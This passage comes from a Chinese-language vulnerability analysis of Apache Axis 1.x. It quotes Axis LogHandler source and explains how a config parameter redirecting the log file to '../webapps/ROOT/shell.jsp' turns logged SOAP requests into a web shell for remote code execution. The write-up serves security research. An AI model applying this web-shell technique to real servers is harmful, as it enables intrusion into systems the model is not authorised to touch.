  <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp"/>
 </handler>

配置了一個LogHandler

org.apache.axis.handlers.soap.SOAPService#invoke

public void invoke(MessageContext msgContext) throws AxisFault {
    log.debug("Enter: LogHandler::invoke");
    if (!msgContext.getPastPivot()) {
        this.start = System.currentTimeMillis();
    } else {
        this.logMessages(msgContext);
    }

    log.debug("Exit: LogHandler::invoke");
}
private void logMessages(MessageContext msgContext) throws AxisFault {
    try {
        PrintWriter writer = null;
        writer = this.getWriter();
        Message inMsg = msgContext.getRequestMessage();
        Message outMsg = msgContext.getResponseMessage();
        writer.println("=======================================================");
        if (this.start != -1L) {
            writer.println("= " + Messages.getMessage("elapsed00", "" + (System.currentTimeMillis() - this.start)));
        }

        writer.println("= " + Messages.getMessage("inMsg00", inMsg == null ? "null" : inMsg.getSOAPPartAsString()));
        writer.println("= " + Messages.getMessage("outMsg00", outMsg == null ? "null" : outMsg.getSOAPPartAsString()));
        writer.println("=======================================================");
        if (!this.writeToConsole) {
            writer.close();
        }

    } catch (Exception var5) {
        log.error(Messages.getMessage("exception00"), var5);
        throw AxisFault.makeFault(var5);
    }
}

this.getWriter();

private PrintWriter getWriter() throws IOException {
    PrintWriter writer;
    if (this.writeToConsole) {
        writer = new PrintWriter(System.out);
    } else {
        if (this.filename == null) {
            this.filename = "axis.log";
        }

        writer = new PrintWriter(new FileWriter(this.filename, true));
    }

    return writer;
}

這裏對this.filename在前面初始化時候,我們構造了他的數據中定義成了../webapps/ROOT/shell.jsp,讓他寫到跟目錄下。

裏面還構造了一個this.writeToConsole=false的數據。

是因爲我們需要在調用的時候將請求的內容寫入到log日誌中,即../webapps/ROOT/shell.jsp文件。

看到下面代碼

  if (!this.writeToConsole) {
            writer.close();
        }

這裏如果爲true,會將這個文件流給關閉掉。

參考文章

Apache Axis1 與 Axis2 WebService 的漏洞利用總結

Axis源碼分析-Web服務部署(二)

0x03 結尾

漏洞分析篇幅不是很長,整體來說這個漏洞其實就是一個文件任意寫入,但由於這個組件的一些特性。即通過server-config.wsdd來初始化和配置service,那麼就可以寫入一個惡意的service,到該文件中,進行調用實現RCE的效果。在復現漏洞中,發現需要/servlet/AdminServlet取消這個路由的註釋,實際上在測試中發現,訪問該路由會自動生成server-config.wsdd文件,我們需要的是該文件。有server-config.wsdd文件,/servlet/AdminServlet存不存在就顯得沒那麼重要了。至此再一次佩服漏洞挖掘者。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章